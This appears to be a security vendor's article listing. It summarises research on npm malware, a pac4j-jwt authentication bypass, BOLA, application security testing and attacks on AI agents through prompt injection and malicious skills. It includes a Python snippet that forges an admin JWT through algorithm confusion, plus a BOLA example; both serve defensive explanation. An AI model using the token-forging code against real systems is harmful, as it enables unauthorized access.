Articles

Stay informed on security insights and best practices from Snyk’s leading experts.

Showing 1–20 of 371 articles

Inside StegaBin: How a DPRK Steganography Campaign Generated Headlines

North Korean hackers published 26 malicious npm packages using Pastebin steganography for C2. It made headlines everywhere. We checked the data: zero real-world impact. Here's what the campaign actually did, and what it tells us about the real risk of malicious package campaigns.

CVE-2026-29000: How a Public Key Breaks Authentication in pac4j-jwt

CVE-2026-29000 is a CVSS 10.0 authentication bypass in pac4j-jwt that lets attackers forge admin tokens using only the server's RSA public key. Learn how the vulnerability works, whether you're affected, and how to fix it.
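Forging tokens with only the server's public key is the signature of an algorithm-confusion attack: the attacker sets the JWT header to HS256 and uses the RSA public key bytes as the HMAC secret, so a verifier that trusts the header's `alg` field recomputes the same MAC and accepts the token. A minimal stdlib sketch of the idea, assuming that is the mechanism behind this CVE (the blurb does not spell it out), with a hypothetical key placeholder:

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> str:
    """JWT-style base64url encoding without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Hypothetical server public key (in practice, fetched from the server's
# published key material; the real PEM body is irrelevant to the attack).
PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nMIIB...snipped...\n-----END PUBLIC KEY-----"

# Attacker forges a token: the header claims HS256, and the *public* key
# bytes serve as the HMAC secret. A verifier that derives the algorithm
# from the attacker-controlled header will recompute this exact MAC.
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(json.dumps({"sub": "attacker", "role": "admin"}).encode())
signing_input = f"{header}.{payload}".encode()
sig = b64url(hmac.new(PUBLIC_KEY_PEM, signing_input, hashlib.sha256).digest())
forged_token = f"{header}.{payload}.{sig}"

def verify_pinned(token: str, expected_alg: str = "RS256") -> bool:
    """Mitigation sketch: pin the algorithm server-side instead of reading
    it from the token header (signature check itself omitted here)."""
    seg = token.split(".")[0]
    header = json.loads(base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4)))
    return header["alg"] == expected_alg
```

The fix pattern is the same everywhere: the verifier decides which algorithms and keys are acceptable; the token never does.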

Accelerating Public Sector Modernization with Secure AI-Driven Migration

Learn how generative AI accelerates legacy application migration for the public sector—and how Snyk secures AI-generated code, dependencies, containers, and cloud infrastructure from code to cloud.

DAST vs. Penetration Testing: 5 Key Differences

Deciding between DAST and penetration testing is vital for securing modern APIs and microservices. Learn how to combine these methodologies to build a robust, layered security strategy that protects your entire application portfolio.

Top 8 Claude Skills for UI/UX Engineers

Explore the top Claude Skills transforming UI/UX engineering by automating repetitive tasks like accessibility audits and component scaffolding. Discover how to streamline your workflow and focus on the creative decisions that truly matter.

Top 8 Claude Skills for Developers

From Manus-style task planning to Terraform code generation and Core Web Vitals optimization, these 8 Claude Skills give developers repeatable AI-powered workflows for real engineering work.

Six Principles for Rethinking DevSecOps for AI

The six principles are: Developer-First AI Security, Secure AI by Design, Shared AI Accountability, Automated AI Security, AI-Specific Intelligence, and AI Governance & Continuous Improvement.

Your AI "Skills" Are the New Agentic Attack Surface

As AI moves beyond simple chat to autonomous execution, the skills powering these agents have emerged as a dangerous new attack surface. Learn how to protect your organization from malicious AI agent tools while maintaining development velocity in the age of agentic workflows.

Anthropic Just Launched Claude Code Security. Here's Why That's Great News for the Industry

Anthropic's launch of Claude Code Security is sparking headlines about the end of traditional security, but the real story is about the shift from detection to automated remediation. This move validates a layered security approach that combines AI reasoning with deterministic analysis to protect the modern software supply chain.

Building Safer AI Agents with Structured Outputs

Learn how structured outputs help developers build safer, more reliable AI agents by enforcing strict schemas during token generation. Discover the essential frameworks and security tools needed to move your AI agents to an enforcement-based production environment.

Top 8 Claude Skills for Finance and Quantitative Developers

Quantitative finance is evolving as algorithmic traders shift from AI skepticism to practical automation using Claude Skills. Learn how to leverage the latest Claude Skills and security best practices to reclaim mental bandwidth for high-level financial judgment.

SAST vs. DAST vs. IAST vs. RASP: Understanding Application Security Testing Methods

Navigate the key differences between SAST, DAST, IAST, and RASP. This guide explains how to integrate these testing methods throughout the software development lifecycle to eliminate blind spots and block real-time attacks.

BOLA: The API Vulnerability Hiding in Plain Sight

Discover why Broken Object Level Authorization (BOLA) is the #1 OWASP API risk. Learn why traditional testing tools fail to test this "hidden" flaw properly and how Snyk’s AI-powered DAST provides the context needed to stop data breaches.
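BOLA is easy to state in code: an endpoint looks up a record by its ID but never checks that the record belongs to the caller, so any authenticated user can iterate IDs and read other users' data. A minimal sketch with hypothetical data, showing the flaw and the object-level check that fixes it:

```python
# Hypothetical order store; in a real API this is a database lookup.
ORDERS = {
    101: {"owner": "alice", "total": 42},
    102: {"owner": "bob", "total": 99},
}

def get_order_vulnerable(order_id: int) -> dict:
    # Classic BOLA/IDOR: the record is keyed only by ID, so any
    # authenticated caller can fetch any user's order.
    return ORDERS[order_id]

def get_order_fixed(order_id: int, current_user: str) -> dict:
    order = ORDERS.get(order_id)
    # Object-level authorization: the record must belong to the caller.
    # Returning the same error for "missing" and "not yours" also
    # prevents attackers from probing which IDs exist.
    if order is None or order["owner"] != current_user:
        raise PermissionError("not found")
    return order
```

Because the vulnerable version is perfectly valid code with no injectable input, scanners that only look for syntactic flaws miss it; catching BOLA requires knowing which user should be allowed to see which object.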

Your Clawdbot (OpenClaw) AI Assistant Has Shell Access and Is One Prompt Injection Away from Disaster

Is your personal AI assistant secure? Dive into the agentic security risks of Clawdbot: prompt injection, supply chain compromise, and network exposure. Discover Snyk's tools to secure your agents.

How AI Agents Still Break Security When Nothing Is Broken

AI agents can fail security without any bugs or vulnerabilities. Learn why agent behavior breaks trust boundaries and how threat modeling mitigates risk.

4 Reasons Why Dynamic Security Testing Is Critical For All Your Assets

Attackers don't just target your crown jewels; they look for the weakest link in your entire application footprint. Limiting dynamic security testing to tier-one apps leaves dangerous blind spots across forgotten APIs and internal tools. Discover why universal DAST is critical for modern risk management and how it helps teams uncover hidden vulnerabilities before they become entry points for a breach.

Inside the 'clawdhub' Malicious Campaign: AI Agent Skills Drop Reverse Shells on OpenClaw Marketplace

Snyk security researchers have uncovered the clawdhub malicious campaign targeting the ClawHub AI marketplace with Trojanized skills that drop reverse shells. This sophisticated attack uses social engineering and obfuscated scripts to compromise hosts via AI agent capabilities on Windows and macOS. Learn how to identify these threats and secure your AI supply chain against evolving agentic workflow risks.

Secure at Inception: The New Mandate for AI-Powered Software Development

Traditional security practices cannot keep pace with AI-powered development. What's needed is a proactive methodology like Snyk's "Secure at Inception". Learn how it helps you prevent vulnerabilities in AI-generated code and reduce backlogs through agile, AI-driven fixing.

Catch Vulnerabilities Early: Your Snyk MCP Cheat Sheet

Integrate security into AI workflows with the Snyk MCP Server cheat sheet. Learn installation, configuration, transport types, core security scanning functions (Code, SCA, IaC), and rules for agentic AI tools.

OWASP AI Exchange: a practical, “one-stop” guide to securing AI (not just GenAI)

The OWASP AI Exchange is a comprehensive open source guide for securing all AI systems, bridging the gap between traditional AppSec and modern machine learning threats. Use this practical resource to implement the G.U.A.R.D. starter plan and scale your AI security program with confidence.